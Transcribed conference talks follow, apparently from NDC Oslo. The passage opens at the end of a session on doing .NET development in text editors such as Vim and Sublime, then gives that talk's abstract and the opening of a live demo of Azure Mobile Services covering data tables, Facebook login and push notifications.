time.
So, you know, you see the compiler error disappear. The test is failing: expected "world" but was null. The method returns the wrong thing; we make it return "world", and now it's green. Okay, so we can do TDD stuff in here, and you can extend it again; the tested-library and tested-class commands are fairly helpful when you do things like that. So I'm going to show you another quick little thing that I find quite useful, because I write UIs that look like they're supposed to be used in the terminal. I don't understand graphic design. I understand it when I see it, and I see, oh, that looks cool, but when I try to create it, it looks terrible. So let's have the fun of seeing me do some UI stuff. Basically, what I'm going to show you is, again, that extending something to do something powerful is very simple. That's what we do. So I'm going to go inside the source thing here, and I'm going to create a project like that. And I have a small command which will let me generate a small single page application using jQuery and Handlebars. Okay, so now I have this thing in here. So I can fire up the editor. Let me get rid of some of these things. At this point, I could actually create a profile that wasn't C#, so I wouldn't have to have the testing tools and stuff popping up, because now I'm doing front end work. So you can do that. You could write some auto completion stuff or type navigation stuff for JavaScript fairly easily. But what I'm going to do is open the index.html, open the index.js, and there's a funny little CSS file in there. So basically, how this thing works: let me just start this up here. Okay, so I'm going to fire up XSP, that's like the IIS Express thingy for Mono, so it just fires up a simple web server which is going to listen on port 8080. And do this. And it says hello world, because this is just the Handlebars templating, so it looks like this: include Handlebars.
Here's the template data: hello, data, world, blah, blah, blah, the JavaScript. And then I go in here and I do the things that I cannot do. And I say my class something. Create the CSS thingy here. And say background-color, because that's the only one I know. I should be able to do this. I can do UI. So last time I did UI, this was very annoying for me, because I had tons of navigation, and I had to go to where the CSS was wrong. And it was always wrong. And I looked at it, I went in, I changed it. I went back, refreshed the page. And I had to navigate, and it was still wrong. Then I started hacking it in Chrome. And then I forgot to pull the changes back from Chrome. It was just a nightmare. So I did something that took me, again, 20 minutes to write. This is an extension written in Node. It's called dumb hack. Basically what it does is start up a web socket server. I'll just write it: a web socket server running in the background, so I can communicate with the editor. So let me just go up here and start the output listener. So basically what I have to do is go into this thing, and I'll insert a template here called web socket client. So just a basic web socket client. I'll go down here. I insert a function. And this is just basic stuff. So you go into document.styleSheets. You just remove the one that's there from before and you add the one that you want in there. I saved this. I pray that I didn't break anything, because this is web stuff. So if I did, I'm going to have to go home. So I should be able to do this now, and I refresh the page and it says connected. Okay. So now I can go inside here and I can say orange. It'll do that. Okay. So now I can just sit in the text editor, and it's going to pull out the buffer change events, and it's going to go into the browser and just update the stuff on the fly. And this is like 20 minutes of my time to make that pain go away.
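The core of the "dumb hack" is tiny: the editor pushes buffer-change events for .css files over a web socket, and the page swaps the matching stylesheet so the browser refetches it. A minimal sketch of that swap logic, factored into a pure function so it can be shown outside a browser; all names here are illustrative, not the talk's actual plugin code:

```javascript
// Given the current stylesheet hrefs and an editor buffer-change event,
// return the new hrefs: the stale copy of the changed .css file is
// replaced with a cache-busted URL so the browser reloads it.
function applyCssReload(sheets, event) {
  if (!event.file.endsWith(".css")) return sheets; // only CSS buffers matter
  return sheets.map(function (href) {
    return href.split("?")[0] === event.file
      ? event.file + "?v=" + event.revision // cache-bust the changed sheet
      : href;                               // leave the others alone
  });
}

const updated = applyCssReload(
  ["site.css?v=1", "reset.css"],
  { file: "site.css", revision: 2 }
);
console.log(updated); // ["site.css?v=2", "reset.css"]
```

In the real hack the browser side would walk `document.styleSheets`, remove the old link, and insert the new one, exactly as described above; the web socket just carries the event.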
So confine the problem down to something that is fairly simple and very specific to the solution you need, and just make it go away. So I can do all the things here. I can do border. I know this one too. It's border-style, right? Solid. I'm good. No, I can't do the blinking. So this will let us work fairly efficiently inside just the plain text editor. So one of my points a bit earlier, where I said stop doing that, was that, okay, I'm using Sublime. That shouldn't mean that you guys should be using Sublime. Okay. So right now I can do this. I can switch editor, almost. Okay. So I get Vim up. It's going to start continuous tests in the background like it did before. I can bring up my horrible WinForms thing. So this is the fallback UI. You're going to see this instead of a Vim plugin, because I don't understand Vim; I need someone to write me a plugin that actually works, but that shouldn't take more than like a day. This guy in the front here is going to write an Emacs plugin, and it probably shouldn't take him more than a day, he said. And I believe that. So I can open my program here and I can save the file and, again, continuous tests will run in the background. I should be able to go to my greetings, my greeter here. I should be able to do alt-R, which brings this thing up. I should be able to, again... this is the horrible WinForms thing that we need to get rid of. We're going to do this. Come on. Don't mess with me now. Let me start this thing. They might be able to see that, but... yeah. So again, we can get the same stuff working. We can also put this thing over here. We can refresh the browser. We can open the CSS file, and when we start typing in here, we should get the changes. Okay. So this works fairly well between the different editors. Let me just see how much time I got left. I've got ten minutes. I'm going to do some cool stuff. Okay. So I wrote in a few other small things that are actually quite useful. Now we have scripts. Yes.
So that makes this cool thing redundant. But I'm going to show you guys it anyway. So basically I want to do some fiddling in C#. So I can do a try-out, which is again a small extension. When I fire this thing up, it's going to fire up Vim, because I've chosen that to be the try-out editor, and it's going to fire up continuous tests. And again, it's always the same sample: Console.WriteLine, hello NDC. I save, it's going to build in the background, and then it's going to spit out the evaluations. This is like a sad attempt at a REPL for C#. But it comes in quite handy when you sit and just want to try something out. And that works for Python and PHP too, for those of you who want to do that. So I have one last thing that I want to say, and that's one of the surprising pain points that I encountered. There were two things that I thought I had to get support for. The first one was IntelliSense; it turned out that was not that important. The second one that I found was a debugger. And that kind of surprised me. And I'm not saying that you don't need a debugger, because you do. We need debuggers to fight non-trivial bugs. So basically what a debugger does for you is this: you sit there looking at a problem. The problem is so complex that, given all the information you know about the system, you cannot figure out what is wrong with it. Okay, so you fire up the debugger, you get more information. And at one point you'll have enough information to understand what is wrong with this code. And then you fix the bug. But how I see us using debuggers all the time is that we wrote code yesterday that we debug today. What does that mean? It means our code is so complex that the stuff we wrote yesterday we cannot understand today. So we need an extra tool to give us more information about the problem, to be able to figure out what is going on. And there's a term for that. It's called real-time legacy code.
And you really see that when you jump out of Visual Studio, you start working in an editor, and then you start looking at code written by someone using a debugger. Because the only way you can reason about that type of code is if you have a debugger. So that's one of the pain points that I want to feel: if I can't understand my code, there's something wrong with my code. So I need to feel that pain so that I can stop doing that. I actually think that's the thing. I'm going to leave it at that. Any questions? Yeah. In the beginning you showed that you are pulling in the Nancy package. Yeah. Are there any practical reasons for you not using NuGet, or was it just for demonstration purposes? It was basically that I didn't need it. So I have most of the libraries just on my machine. So the few times I use dependencies, I pull them down in some way and put them in the project. I make very conscious decisions about when I want to update a package, because I know updating a package is going to make my system less stable, because it's going to introduce side effects that I don't know about. So that way I just haven't had the need for it. I guess a lot of other people use it. Yeah? Yes. Do you have any solution for that? Yeah. So the question was the discoverability of packages. That is quite interesting. It's like, IntelliSense is what helps you with that. And that's where you see one of the fundamental problems around the .NET community, because IntelliSense is known as documentation. It's not. If you go to other languages... like, try Go. You want to figure out something in the language? There's great documentation: this is how things work, this is what you should do with this. This is not. So for that problem, I'm thinking that you could do it the IntelliSense way. But I've thought a bit about it, and I don't think that that is the way I would want to represent it. Because when I'm looking at an API like that, I want to discover something.
I probably want to represent it like something of a structure where I can kind of move up and down. I think maybe if your editor was Sublime, you could probably do a second panel. Yeah. And have it context sensitive, to go and look up the relevant documentation. And that could be a plugin that could fairly easily be written. Either that or you can just push it up in a browser. I have no idea. Any other questions? Yeah. How well does this play with stuff like OmniSharp, which will actually do the IntelliSense? Yeah. That's a good point. I was supposed to mention that OmniSharp is a plugin for Vim that will actually provide you with quite a bit of refactoring support, and it'll do IntelliSense for you, and you'll get a lot of other information, and they play fairly well together, because they don't conflict with each other. You can do the project management stuff and project file management stuff, and you can use OmniSharp for IntelliSense and all those things. And I would actually recommend any of you who use Vim to have a look at it, because it's quite powerful. Any other questions? Then thank you for listening. And if you thought I was a raving lunatic, then have some sympathy and put a green note in there. Thank you.
As a .NET developer, when you write code you write that code in Visual Studio. That has been the de facto standard since the origin of .NET. Does it have to be that way? Today we have alternatives like MonoDevelop (Xamarin Studio) and SharpDevelop. For the last two years or so I have been writing all my .NET code in regular text editors like vim and Sublime. There are several benefits to working this way. In this talk we will dive into:
- How and why you would want to do your work outside of Visual Studio
- The good and the bad of the .NET environment
- How this affects the way you write and organize code
- Busting some of the myths behind developer productivity
10.5446/50623 (DOI)
All right, let's see if it's working. Woo, we have sound. Fantastic. Right, there's a lot of people here. You actually found your way to Room 6. It was kind of a little maze you had to work your way through. If you were smart enough to get up here, you're smart enough to leave if you want now. It's okay. This is Windows Azure Mobile Services. So if you're not ready for this talk or this is not what you're expecting, run. I'm trying to get people out, I swear. My name is Niall Merrigan and I work with Capgemini Norway. And this is actually going to be Azure Mobile Services, because Microsoft decided to drop Windows from their Azure branding in a masterful move, because everyone associates Windows with Microsoft, and Microsoft with not running anything else. But Azure actually runs quite a lot of other stuff besides Windows, so that's why they dropped it. It just means that all my slides are now a bit out of date. But if you've got Twitter and the internet and stuff like that, you can tweet me at nmerrigan and use the official NDC Oslo hashtag. There is a rating system and feedback system for speakers. As a speaker, I'm very narcissistic. I do love when someone tells me I'm good. I don't like when people tell me I'm bad. But I do appreciate that I may not hit all your buttons on the one day. So if there's something wrong, please tell us as speakers in general what is wrong. Because if you don't, it's like sending in: there is a bug. And I will reply back: there is a solution. And you will go: for what? And I'll say: for what you told me was wrong. And they will go: okay. So please, it's green for I like you, yellow for I thought you were okay, and red for I don't want to be your friend. It's very simple. If you're colorblind, just pick something up and throw it in. I'm Irish and I live in Ireland... or live in Norway, actually. But these are actual Irish road signs. We advise you not to go at the speed limit.
For our international audience, people watching at home and stuff like that. In Norway, the speed limit is about 80. And this sign scares a lot of Norwegian drivers, because it's on the wrong side of the road and going up a cliff, and you can fall off. However, Norway does like to enforce the speed limit. So they just put tanks beside their photo boxes. I'm sorry, sir, you're getting two points on your car. Done. I work with Capgemini Norway in Stavanger. I am the head of custom software development there. I am an ASP.NET MVP, ASP Insider, member of many developer advisory councils, general shouty person. And today this is going to be about Azure Mobile Services. Now, back in the old days, when most of us were small and didn't know what a computer was, this was a database. This was our computer. And people generally, if they worked in one language, stayed in one language. If they worked in one technology, they stayed in one technology. Hi, I'm a VB developer. I write forms and line-of-business applications. Hi, I'm a Silverlight developer. I'm extinct. Hi, I'm a COBOL developer. Sorry. I had to shove that in. Hi, I'm a COBOL developer. I'm old. I don't do anything else. That's all I did. Very much focused on one technology, one language, nothing else. Now, we are all multi-platform. We're all about multiple different devices, multiple different technologies. If I asked any developer here, most of you would say, I know one language. I can probably do SQL. I'm learning two others as I go along. I'm working on .NET. I'm working with Linux. I'm working with Mac. I work with many different application technologies and platforms. But something that always remains in the background is the very humble database. It is, for a lot of people, where they begin their development process. It's a bad way to begin your development process, beginning with your database.
But if you now want to share your data across multiple applications, which is a given in today's society, the idea that I would actually have to pick something up off one computer, carry it to another device, and load it up there is incomprehensible. How many of you, if I said, sorry, do you want a copy of that code? Okay, will you come over to my computer, put in your USB stick, take it off, copy it over to your other device, and load it up there... and you're like, but why can't you just share it online, or why can't you just share it somewhere else? This idea of me having to physically move to a device to get the data is gone. The problem is, if you have to share all this data, how do you scale up? And how do you share all this data? Do you build your own data center? Do you make your database accessible to all the world? Or do you say, well, you know what, I can deploy a back end in the cloud, or I can just make a back end available? And this is what Azure Mobile Services is. It's your back end in the cloud. This is the product slide for this, and it hasn't been updated yet, but it's all about the data. You can store data in the cloud that can be shared across multiple devices. It also gives you push notifications. Now, notifications have become the de facto way of telling people there's something they have to do with your application. We don't expect customers to actually open up our app, refresh to see if something happened, and then close the app. Customers like to be notified. Hi, you've got something you need to look at. Please look at it. Okay? We've gone beyond the idea of, I'll just go check my mail to see if I have mail. It's like, I expect a notification, I expect a buzz, I expect something to tell me that there's something for me to look at. Notifications are a standard now that you have to use on any mobile device. And now, for example, in other platforms such as Windows 8, you have push notifications on the desktop.
We've seen it in the browser for a long time, but now it's coming to applications on the desktop as well. We now also think of authorization and authentication. Do you like remembering passwords and usernames? How many of you do? Anyone? No? No one likes to remember them. How many of you say, okay, sign up with Facebook or Google or Hotmail or whatever, and go, okay, great, click the button, done. One less thing I have to remember. Sorry, is that something I like doing? I do, sorry. Troy Hunt is here. He's a security guy, so if you're going to see his talk, he'll have a lot more of these fun questions. You've got server logic. We've gone beyond the idea of putting code on the front end that cannot be shared, where any time I have to do an update, I have to push an update to my application. We had, for a long time, n-tier applications where business logic stayed in the middle tier and data logic stayed in the bottom tier, and then the front end was just visualization. The exact same thing happens here. I want to store stuff that is common to all my devices and all my platforms in the one place. If I need to change it, I update it once. I don't need to update my application. Why do I want to do that? You've got diagnostics, you've got logging, and scale. Right. I think we should start and show you how it works. We'll just start with a little demo. This is how I think these demos work. Let's do it. Welcome to the Azure portal. How many of you have seen the Azure portal? Everyone? Actually, first off, question. How many of you know what the cloud is? How many of you don't know what the cloud is? Good. Because I would say if you want to see the cloud, just look outside. It's wet. If you want to create one, it's very simple: log in with your Live ID, create new, a very simple mobile service, click create. We are going to create a URL which I'm going to call ndc-oslo-v2. I have a v1 just in case everything goes tits up on this, because it did before. Use a new database.
You get 20 megs free. Database all exists for Azure. Okay, using existing database. West US, I think I'll go for North Europe. You can actually use either JavaScript or.NET preview. Personally, I prefer the JavaScript version. The.NET is kind of web API stuff I'm built in. I don't know. I think when I'm doing mobile services, because it started off in JavaScript, it's just a bit more easy and it kind of sits that fluid way of working. I'm thinking that's what we should be using. I'm just going to just do... You must follow by a SQL password. Okay. We might just use any creating a SQL instance just in place. It might be just easier. ndb, configure server, North Europe. Now... And we click OK and we provision. So we wait a little bit longer. Following mobile services is not created. Database percentages are incorrect because firewalls are... Fantastic. Right, we're going with the one that I've created before, just in case. I honestly think that this has the demo gods of going, we will smite you. Smite you hard. I didn't say everyone starts with a hello world. I know I'm sorry. I didn't start with a hello world. All right, let's do this. And we'll bring up Visual Studio and I'll have my ndc-osl app. Okay. You can actually download an existing create new store app and just create... And just download this. And it will download a very sample app which we're going to use because it's nice and simple, open folder. One thing is if you download it, remember to unblock it because otherwise it will tell you you have to do that for everything. And it becomes quite annoying. Now we wait 15 hours for Visual Studio to load. Woohoo! It decided it would wake up today. I spoke too soon. I spoke too soon. Oh, God, come on. Hello? There we go. ndc-osl unavailable. Why could you not... That's probably because I'm reading this. We'll go into Server Explorer and inside here we can see in the tooling, I can see the mobile services that I have existing already. 
Now it's going to tell me I need to put in my password. Or I hope not, maybe not. I can see that I have an ndc-osl application written here. If I go back to my mobile services, as you can see it maps up to the two ones I have here. It's very simple to see all this. In ndc-osl, this is my dashboard. And it shows me as my mobile service what's actually happening. I've got a mobile service URL. It's running on HTTPS ndc-osl azuremobile.net. And I've got a database against ndc-osl db. I can see my data. I've got an API, custom API. I've got a scheduler, push, identity, logs, etc. What I'm going to do here, if I can see if this will work for me, we are just going to, I just have to rebuild this quickly. Actually we'll just press F5, it will be fine. If we press F5, and we wait, wait some more. Activation requests this error because the screen resolution is before. This is just fun. Screen resolution. It's 1280 by 720. Alright. Turn it to 11. Okay. Can everyone still see the screen? We're all good. Excellent. I bet you it's, no, we're okay. Registration successful. This is for push notifications. So when I insert it to do item, I click save. It should save this out. Okay. No reference exception. I'm sorry. I know it's like, sorry. I'm not having a good day today, am I? Alright, one second. Yes. The problem with the screens as well. It's like an etch-a-sketch. The problem with screens, let me just... Sorry, the joke was it's like an etch-a-sketch up here, so they're just going to flash the screens. Are we still good? No? We're not good? Alright, let's do a screen resolution down again. 1336 by 768. Apply changes. Is that all there? Alright. Let's see what's going on. Okay, we'd have to go back and see what actually the mobile service is doing when we look at our database in order to do item in our script. So we have an sent to script, and we'll do that. Okay. Refresh to do items. Let's just see what's going on. Refresh to do items. 
So if we press F5, it says invalid in there, so that'll be fine. But I'm going to open up the... Close this. Close that. We'll bring up the other one. And see if that'll work for me. Oh, the demo gods, they are fun. So while I'm burning here on stage... Yeah. Ha ha ha. Oh, there's always one funny Englishman in the back, isn't there? So if we go back to... Where's my v2 version of that? Alright. At least the sun is still shining. At least the sun is still shining. That's right. That's... distraction. Okay. Let's see if this will work. Close that. I'm sorry about this. This is always the mobile services talk. It works fine. It works on my machine, TM. I should actually just record the whole thing and say it actually does work. Well, while I'm here, we'll talk about it a bit more. Inside our TodoItem table here, we have a database that actually supports dynamic data. So it has dynamic schema enabled. This means that as I build my application, I don't actually have to define what the table contains. I can actually say, please just use whatever object I'm sending in and build the schema accordingly on the database. So for example, say I have my to-do item here. If it will show me, let's see. Excellent. If we go back to the main page, yes. We have a to-do item here, which has got ID, text, and complete. It's got a JSON property. It should pick it up. Come on. And I'd say actually what's happening here is it just needs the package restore: Tools, NuGet Package Manager, and restore. Oops, sorry. Tools, NuGet Package Manager, restore these. So what will happen is that it will build. We should be just closing this. I'm finished. Great. Done. Now, have we got this? Can it resolve the symbol? Oh, fantastic. So what it will do is it will put in the ID, text, and complete. If we go back to our mobile services here in... Did it bring up v2? Mobile services? Oh, yeah, because it didn't create the NDC Oslo one.
So there we go. In our data, when I create a to-do item, it actually generates the columns. It'll show me that it will generate the text, complete, and ID parts by actually adding those in. So... Why is this not picking up? Yeah, I'll try to build, just to make sure. It's all started. It should pick it up fairly quickly. Build succeeded. Lovely. We're still giving... There we go. Thank God. Something actually works today. So if we look here, when it creates the sample item, you actually create a new mobile services collection. It works against the TodoItem table, which it just gets with GetTable<TodoItem>. So it maps up against the GetTable call. It will then say, I want to await InsertAsync on the to-do item, and then just click add. It sends that up to the mobile service. The mobile service will receive that as the insert command, and say, okay, what do I want to do with this request? I want to go to the database. Right. I've got a number of different properties I don't recognize, but they're JSON serialized, and so I can... Because I've got dynamic schema enabled, I will just expand my schema to actually match those object types. And that's all it has to do. So if I press F5, this should actually connect up to the other one. If we're working. See, there we go. We've got to refresh our data; so far, so good. Sample item, insert. If we click save.
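The dynamic schema behavior described here can be illustrated with a small sketch. This is not the service's code, just a toy function showing the idea: given the JSON item a client inserts, derive the columns the table needs, so properties the table has never seen become new columns automatically.

```javascript
// Illustration of dynamic schema: infer a column definition for each
// property of an incoming JSON item. The type mapping here (number ->
// float, boolean -> boolean, everything else -> string) is a simplified
// assumption, not the service's exact rules.
function inferColumns(item) {
  return Object.keys(item).map(function (key) {
    const value = item[key];
    const type =
      typeof value === "number" ? "float" :
      typeof value === "boolean" ? "boolean" :
      "string";
    return { name: key, type: type };
  });
}

console.log(inferColumns({ text: "sample item", complete: false }));
// [{ name: "text", type: "string" }, { name: "complete", type: "boolean" }]
```

With dynamic schema turned off, an unknown property would instead be rejected, which is why you disable it before shipping to production.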
If I then put it into, for example, a mobile device, and I connect up to the exact same table, that device will have the same data, because it'll have the application key. If I go over to the server explorer here, and back in, I can... If I go into mobile services... A bit more, and I go to ANDC Oslo. We have our to-do item, which I can expand here, and I can actually see that on the insert, I can see the actual code that I'm writing against it. Now, this particular piece of code, it says, I want... When you insert, I want to send a response that I've inserted, but I also then want to send a notification, which uses notification hubs to push a notification back to all connected clients, and I'll explain that in a second. Now, if I want to add authentication, to do this, I would actually have to go into Facebook... Like, for example, if I want to add Facebook authentication, if we go back and explain a little bit about this. On Facebook authentication, you need to set up a developer account on Facebook. So that goes to developers.facebook.com, register yourself as a developer, and then you will be given this effectable dashboard for here. Very simple. I've created a demo account here. I create apps, create a new app, and this will come up with a display name, and you have to use a unique identifier here. Just note, it has to be lowercase for this, and then just choose a category and create the application. Once the application has been created like here, you then add a new platform for it. So that goes into settings, click Add a Platform, put in your site URL to your mobile device, or your mobile services, go back... Once you have that, into dashboard again, you go back and forth a little bit, I'd love this to be a bit simpler, copy out the app ID and the app secrets, go into mobile services... Hello, mobile services, yes, thank you. And we go into identity. And here, I can put in my different authentication schemes. So I have my app ID and my app secret. 
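The server-side insert script just described (respond to the client, then push a notification through the hub) has roughly the following shape. In the real service, `request` and `push` are globals supplied by the mobile services runtime; the stubs below exist only so the flow can be exercised outside Azure, and are marked as such.

```javascript
// Roughly the shape of a mobile services insert script: save the row,
// respond to the caller, then fan a toast out via the notification hub.
function insert(item, user, request) {
  request.execute({
    success: function () {
      request.respond(); // tell the client the insert succeeded
      // null tag = broadcast to every registered channel
      push.wns.sendToastText04(null, { text1: item.text });
    }
  });
}

// --- stubs standing in for the Azure runtime, for illustration only ---
var sent = [];
var push = {
  wns: { sendToastText04: function (tag, payload) { sent.push(payload.text1); } }
};
var request = {
  execute: function (opts) { opts.success(); }, // pretend the DB write worked
  respond: function () {}
};

insert({ text: "sample item" }, null, request);
console.log(sent); // ["sample item"]
```

The key design point is ordering: respond to the client first, so the insert isn't held hostage by however long the push fan-out takes.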
You can add Twitter. The thing with Twitter is that if you're doing this against local hosted, it will fail. So it's a valid, actual account that will do it. What I recommend if you're trying to test locally against with Twitter authentication against mobile services is instead of using local host, use a domain name that is just you have in your host file. So it will just map like example.com, and you say example.com. Yes, you can copy the key and I will look at it in a minute. It's fine. Sorry, the security guy here is just making jokes. It's not funny. It's bad enough up here as it is. So with Google and also with the Windows Azure Active Directory, and you have the Microsoft Live ID if you wish to use that. So once that's done, to enable security on your application, you click on permissions. And right now, it says the insert permission is anyone with the application key. So if I've got the application key to this application, you can use it. A word of note, the application key here is kind of sounds like it's a security token. If you're using authenticated login, if you just want to use login, use your mobile services to do your login, or OAuth login, the application key is actually not required. So because the actual JavaScript involved in this doesn't actually respect the authentication key. So any application can use your mobile service to OAuth. Now, it's, well, it's just, it's no big deal, but it means that you'll end up with a whole lot of service calls, and it could, you end up with possibly an idle service attack, whatever. Yeah, it's one of those things that I kind of found a bit weird that it didn't allow you to do that. So with the read permission, I'm just going to change it to only authenticated users, so it'll actually force the application to be authenticated at the start. Now for the application, it will be, to do the insert, you will need to have an authenticated token. We click wait for permissions. Good chance to get a glass of water. 
Have there been any questions so far? Anything at all? This is kind of weird. It's a real long, yes, sir? If you're more than one developer working on mobile services, how can you connect? If you're more than one developer working on mobile application services, how can you connect as in? So to this interface, I want to share with somebody else. So more than one developer or a team? Yes, and you want to use the actual, not this interface, like for example, you can use Visual Studio if you wish, but the thing is if it's a shared account, it'll have to be like a company account, which would mean that when you connect up here and use server explorer, and you say connect to Azure, you connect to Windows Azure, you actually, I'm currently selling this as my actual live account, but if I had an actual corporate account or something that was shared, you could actually use that in that case. Yeah, it's a cost issue, of course, but the thing is if you have a corporate account, in other words, this can all be server free, but say for example, you have a shared email address, mycompanyatlive.com or outlook.com, and say 20 developers have the password for it, they can all connect. It's not going to say that it has to be just one developer. In other words, I can have this running on four machines side by side, and it's not going to worry that, but you'll have concurrency problems if for example, someone changes something and it's code. It does support Git on this, so if you want to do actual changes and push back and forth, you can actually do that instead, and actually develop locally, push up to Azure and it'll work. So good question to answer is you have to have a shared email address that people will use. So to go back to our authentication, we should have now been authenticated. We've done, all right, excellent. So if I go into NDC also again, and I go back to my solution and main page. 
To actually authenticate, I need to insert my snippet, which adds a MobileServiceUser, to tell it that I want something I can store the user credentials against, and an AuthenticateAsync. So I added a new function called AuthenticateAsync. And what this does, as you see here, is it says await App.MobileService.LoginAsync(MobileServiceAuthenticationProvider.Facebook). So it will use .Facebook, and it will use Facebook. You have the option here of Facebook, Twitter, Microsoft account, and Windows Azure Active Directory. So we'll go back to Facebook. Excellent. And then to do that, we will have to tell it that on the... when the... where is it? Going down here. Back down here, where we refresh the to-do items in OnNavigatedTo, it will be await AuthenticateAsync. And that will give an error, because I need to put override async void. Now, press F5. We pray to the demo gods a little bit. Again. Hey! So it will come up with my connecting to service. Come on. There it is. As you notice, I'm using a very nice, effective hidden domain thing called opaque. I actually really love this domain name, opaque, for those who actually speak English. It's quite funny, but for those who don't, it's going to... huh? And it'll keep me logged in. I'll log in. Now you're logged in as Facebook user X. So I've now actually authenticated against my mobile service in what can be considered a couple of clicks and a bit of running around. But that's it done. Those are the easy bits. What we're going to talk a little bit more about now... if we go on, we have our hammer time slide, Active Directory... we're going to talk a bit more about push notifications. Push notifications have come a hell of a long way. Right now you have Windows Notification Services, Windows Phone notification services, Google Cloud Messaging, and Apple Push Notification Services.
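Stepping back to the authentication flow just shown: under the covers, each provider login is an OAuth dance against the service's login endpoint for that provider. A small helper (illustrative, not the SDK; the provider name list and URL pattern are assumptions based on the providers mentioned in the talk) that builds the endpoint URL the client is sent to:

```javascript
// Build the mobile service login endpoint for a given OAuth provider.
// Both the pattern "<service>/login/<provider>" and the provider names
// below are illustrative assumptions for this sketch.
function loginUrl(serviceUrl, provider) {
  var supported = ["facebook", "twitter", "google", "microsoftaccount"];
  if (supported.indexOf(provider) === -1) {
    throw new Error("unknown provider: " + provider);
  }
  // strip a trailing slash so we don't emit "...net//login/..."
  return serviceUrl.replace(/\/$/, "") + "/login/" + provider;
}

console.log(loginUrl("https://ndc-oslo.azure-mobile.net/", "facebook"));
// https://ndc-oslo.azure-mobile.net/login/facebook
```

In the C# client all of this is hidden behind the single LoginAsync call; the helper only makes visible what that call is doing.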
And if you want to push to all those different devices, you have to know how to send the different toasts and tiles to each particular device. It seems like a lot of work. As a developer, I like stuff being easy; I like stuff being wrapped up a little so I can just say "make it work" and be happy. That is where notification hubs come in. They're in preview right now, but what they allow you to do is say: hi, I want to send a message to everybody. Great — who do you want to send it to? All connected devices. Can you fix that? It goes, "I fix," and just sends it out. It'll do a simple push notification to all devices, regardless of device type or which push notification service each one needs. However, you can override it and say: okay, for Windows Notification Services, I want you to send this particular toast and tile. No problem, it can do that. So I want to show you how that actually works. To enable push notifications, normally what you do is right-click on your application up here and — where's it at — you have "enable push notifications", and it enables push notifications on your application. It takes a couple of minutes, but what happens is it asks you to register a namespace and an application name. When you go into the Dev Center for Windows and log in — keep me signed in — this registers your application against the Dev Center and gives you an application name. So for example, here I have NDC Oslo. When I click edit on this, it shows me the different pieces — it does this automatically for you. Enabling push notifications gets this piece done for you: it gives you your app name, reserves it, enables push notification services on your application, and sends the client application secret back to you.
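The abstraction just described — one generic send to every connected device, with an optional platform-specific override — can be sketched like this. The method shapes (send, wns.sendToastText01) mirror the hub API the talk uses later; the stub hub is my own so the sketch runs anywhere.

```javascript
// Sketch of the notification-hub abstraction: a default cross-platform broadcast,
// plus an optional WNS-specific override. The stub hub records what was sent.
function broadcast(hub, message, platformOverrides) {
  if (platformOverrides && platformOverrides.wns) {
    // Override: send a WNS-shaped toast to Windows devices.
    hub.wns.sendToastText01(null, { text1: platformOverrides.wns });
  } else {
    // Default: one message, every device, whatever push service each needs.
    hub.send(null, message);
  }
}

var log = [];
var stubHub = {
  send: function (tags, body) { log.push({ via: 'all', body: body }); },
  wns: { sendToastText01: function (tags, payload) { log.push({ via: 'wns', body: payload.text1 }); } }
};

broadcast(stubHub, 'Hello everyone');
broadcast(stubHub, null, { wns: 'Windows-flavoured toast' });
console.log(log[0].via, log[1].via); // all wns
```

That's the whole value proposition: you only drop down to the per-platform call when you need platform-specific payloads.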
When you go into your Live Services site here — again, this is the thing: enabling push notifications on mobile services wraps all of this up for you, so you don't have to worry as much about doing it by hand. Before, it was a manual process of signing up to the Dev Center and signing up to Live Services; this just enables it. It gives you your application identity, your client ID, and your client secret, and these are all wired back into the push notification service here — it automatically pre-populates them into your application. This is built on a subset of the Azure Service Bus. So when we go into the NDC Oslo hub, I can see my notification hub here, which is directly linked back to my mobile service. That's what it provisions: an Azure Service Bus namespace, and inside that, a notification hub. This allows you to send your push notifications to any connected device. How does your device actually receive notifications? It simply says: when I connect to your service, I'm going to register a channel URI. Great. Our application holds onto that and uses it for sending information back. You do this every time you register your device against your mobile service. So in our application, I'm going to take out my await here, because I really don't want to have to log in every five seconds, and I'm going to go into App.xaml.cs and enable push notifications — I'll just add it here. If I add push notifications, it does this: sign in to the Windows Store. And we have to go here — yes, I don't know my own passwords for stuff anymore. Text it, okay. What could possibly go wrong with two-factor authentication? I feel like the guy who has to open all the locks and you hear ch-ch-ch-ch. Submit. Yay! So I've got NDC Oslo here, and it'll do that, and click next.
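The channel-URI handshake mentioned a moment ago — register on every connect, the service holds the URI — can be sketched as a simple upsert. Everything here is stubbed so it runs anywhere: in a real Windows Store app the URI would come from the OS push API (PushNotificationChannelManager), and the "channels" table and field names are my own invention for the example.

```javascript
// Sketch of channel registration: one row per device installation, URI updated
// in place when the device re-registers. Both the table and the channel URI are
// stubs standing in for the real mobile service table and OS-issued URI.
function registerChannel(channelTable, installationId, channelUri) {
  var existing = channelTable.findByInstallation(installationId);
  if (existing) {
    existing.uri = channelUri;      // device re-registered: update, don't duplicate
    return existing;
  }
  return channelTable.insert({ installationId: installationId, uri: channelUri });
}

// Stub "table" standing in for a mobile service table.
function makeStubTable() {
  var rows = [];
  return {
    findByInstallation: function (id) {
      return rows.filter(function (r) { return r.installationId === id; })[0];
    },
    insert: function (row) { rows.push(row); return row; },
    count: function () { return rows.length; }
  };
}

var table = makeStubTable();
registerChannel(table, 'device-1', 'https://wns.example/channel/abc');
registerChannel(table, 'device-1', 'https://wns.example/channel/def'); // update, not duplicate
console.log(table.count()); // 1
```

The upsert matters because channel URIs expire and get reissued — you want the latest URI per device, not a growing pile of stale ones.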
It'll hook it up to a subscription, which I already have. And I'll say NDC Oslo, next. Finish. It provisions this against Windows Azure and mobile services — this takes a little bit of time. Okay, any of the push notification services. Done. And done. So that's it: we have our function set up that will notify all users and send an SMS. Excellent. Fantastic. Okay, so that's enabling push notifications on the server. Now we have to enable it in our application, which is quite simple. Go in here, and we set up a new function — my snippet, InitNotificationsAsync, down here. Yes, there we go. I forgot how to do this before, so: love, Mom, thank you, Mom. Package Manager console — yeah, there we go. It should have just done it already. And just paste. Install package. Come on. There we go. Remember when I said this thing is reliable? For all definitions. The package is WindowsAzure.Messaging.Managed. Oh, great. Fine, fine, fine. It's just not funny. Oh no, it is — trust me, it's hilarious, isn't it? All right, fine. Why are we not doing this? So in the application — no, I don't want to create a new class, I want to install the package. Install-Package Microsoft... WindowsAzure... no, not that one. Messaging.Managed. Why is it not giving me this? Yeah, I thought so. It should install the package for me. So install this. Oh, I love you. What the hell? I'm going to just search for it in the package manager. Messaging.Managed. Installed. There we go. Yes, I accept. Was that so hard? Oh, thank God. I love it. So we need to init then — I just removed this — I'm going to say InitNotificationsAsync. Okay, F5 that. An exception was not handled in user code. What the 